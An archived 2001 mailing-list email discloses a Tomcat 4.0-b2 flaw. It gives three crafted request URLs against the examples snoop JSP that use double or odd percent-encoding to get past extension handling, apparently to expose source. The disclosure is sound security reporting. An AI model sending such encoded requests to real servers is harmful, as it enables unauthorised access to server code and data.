---------- From: "lovehacker" <[EMAIL PROTECTED]> Date: Mon, 2 Apr 2001 14:39:08 +0800 To: <[EMAIL PROTECTED]> Subject: regards from lovehacker hi jon: >#1. Please report security issues to [EMAIL PROTECTED] >and/or [EMAIL PROTECTED] first. It seems >like that is a common courtesy. I am very sorry! i will report security issues to [EMAIL PROTECTED] first time. Tomcat 4.0-b2 Vulnerability look at this: http://Tomcat4.0-b2:8080/examples/jsp/snp/snoop%252ejsp "%252e" like "." or http://Tomcat4.0-b2:8080/examples/jsp/snp/snoop.jsp%2581 "%2581" like "?" or http://Tomcat4.0-b2:8080/examples/jsp/snp/snoop.js%2570 "%2570" like "p" lovehacker China Network Security League http://www.chinansl.com [EMAIL PROTECTED]
